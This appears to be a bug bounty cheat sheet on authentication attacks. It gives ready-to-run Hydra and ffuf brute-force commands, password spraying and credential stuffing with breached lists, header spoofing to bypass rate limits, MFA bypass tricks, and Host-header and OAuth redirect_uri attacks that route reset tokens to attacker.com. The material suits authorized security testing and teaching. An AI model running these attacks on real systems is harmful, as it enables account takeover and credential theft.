Skip to content
Web Security

Authentication Attacks

Password attacks, credential stuffing, MFA bypass, and session management

Username Enumeration

Error Message Analysis

TEXT 
# Different responses
"Invalid username" vs "Invalid password"
"User not found" vs "Wrong password"
"Email does not exist" vs "Incorrect password"

Timing-Based

TEXT 
# Measure response time
Valid user → longer (password check occurs)
Invalid user → faster (early exit)

# Tools
ffuf with -mc all -fs X --time

Response Differences

TEXT 
# Check for
- Different HTTP status codes
- Content length variations
- Response time differences
- Different redirect URLs
- Subtle wording changes

Registration Page

TEXT 
# Check taken usernames
POST /register
{"username": "admin"} → "Username already taken"
{"username": "test123"} → "Success" or different error

Password Attacks

Brute Force

BASH 
# Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# ffuf
ffuf -u https://target.com/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fc 401

# Burp Intruder
Positions: password field
Payload: wordlist

Password Spraying

BASH 
# Few passwords against many users
spray.sh -h target.com -U users.txt -P passwords.txt

# Common passwords to try
Password1
Password123
CompanyName2024
Welcome1
Summer2024
[company][year]

Credential Stuffing

BASH 
# Use leaked credentials
credmaster -t target.com -u breached_creds.txt

Rate Limit Bypass

IP-Based Bypass

TEXT 
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: random_ip
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1

# Rotate IPs in each request
X-Forwarded-For: 1.2.3.1
X-Forwarded-For: 1.2.3.2
X-Forwarded-For: 1.2.3.3

Account-Based Bypass

TEXT 
# Case variation
admin
Admin
ADMIN
admin@target.com
ADMIN@target.com

# Whitespace
admin 
 admin
admin%00
admin%20

# Unicode normalization
αdmin (Greek α)
аdmin (Cyrillic а)

Request Modification

TEXT 
# Add null bytes
username=admin%00&password=test

# Array notation
username[]=admin&password=test

# JSON vs form data
Content-Type: application/json
{"username": "admin", "password": "test"}

MFA Bypass

Direct Page Access

TEXT 
# Skip MFA step
Step 1: /login → credentials
Step 2: /mfa → enter code
Step 3: /dashboard

# Try accessing directly
/dashboard (after step 1)

Response Manipulation

TEXT 
# Intercept MFA response
{"mfa_required": true} → {"mfa_required": false}
{"success": false} → {"success": true}
{"verified": 0} → {"verified": 1}

Code Reuse

TEXT 
# Use old valid code again
# Check if codes expire properly
# Use code from different account

Brute Force OTP

TEXT 
# 4-6 digit codes
- No rate limit: try all combinations
- Check if lockout applies after logout

# Tools
ffuf -u target.com/mfa -X POST -d "code=FUZZ" -w codes.txt

Backup Code Attacks

TEXT 
# Request backup codes
# Check if predictable/sequential
# Brute force backup codes

Session Token Abuse

TEXT 
# MFA cookie reuse
1. Complete MFA on attacker account
2. Copy MFA completion cookie
3. Set cookie on victim session

Password Reset Flaws

Token Leakage

TEXT 
# Check Referer header
1. Request password reset
2. Click reset link
3. Click external link on reset page
4. Check if token in Referer to external site

Host Header Poisoning

TEXT 
# Manipulate Host header
POST /forgot-password HTTP/1.1
Host: attacker.com

# Reset link sent to victim contains attacker.com
Password reset link: https://attacker.com/reset?token=abc123

Token Predictability

TEXT 
# Analyze token structure
- Sequential tokens
- Time-based tokens
- Weak random generation
- Encoded user data (base64 decode)

Token Reuse

TEXT 
# Check if token invalidated after:
- Single use
- Password change
- Time expiration
- New token request

Email Enumeration

TEXT 
# Different responses for:
"Email sent" (user exists)
"Email not found" (doesn't exist)

Session Management

Session Fixation

TEXT 
# Set session before auth
1. Attacker gets session: PHPSESSID=abc
2. Trick victim to use abc: /login?PHPSESSID=abc
3. Victim logs in
4. Attacker uses abc (now authenticated)

Session Token Analysis

TEXT 
# Check for
- Predictability (sequential, time-based)
- Weak randomness
- User data in token
- Insufficient length

# Tools
Burp Sequencer

Logout Bypass

TEXT 
# After logout, check if:
- Session still valid server-side
- Token can be reused
- Other tabs still authenticated

Session Hijacking

TEXT 
# Via XSS
document.cookie

# Via network sniffing (HTTP)
HTTPS not enforced

# Via session fixation
Pre-set session ID

OAuth/SSO Attacks

Authorization Code Theft

TEXT 
# Open redirect in redirect_uri
/oauth/authorize?redirect_uri=https://target.com/callback/../../../attacker.com

# Check redirect_uri validation
- Exact match?
- Subdomain allowed?
- Path manipulation?

CSRF in OAuth Flow

TEXT 
# Missing state parameter
# Predictable state
# State not validated

Token Leakage

TEXT 
# Token in URL fragment
https://target.com/callback#access_token=xxx

# Check for referrer leakage

Bug Bounty Tips

High-Impact Findings

TEXT 
1. Authentication bypass → Access any account
2. MFA bypass → Defeat second factor
3. Account takeover via password reset
4. Rate limit bypass on login
5. Session fixation/hijacking

Testing Checklist

TEXT 
□ Username enumeration
□ Brute force protection
□ Rate limit bypass
□ Password complexity
□ MFA bypass attempts
□ Password reset token analysis
□ Session token randomness
□ Logout effectiveness
□ Remember me security
□ OAuth flow manipulation

Tools

BASH 
# Hydra - Brute force
# Burp Intruder - Automated testing
# ffuf - Fast fuzzing
# CeWL - Custom wordlist
# Hashcat - Offline cracking
Back to Cheatsheets
On this page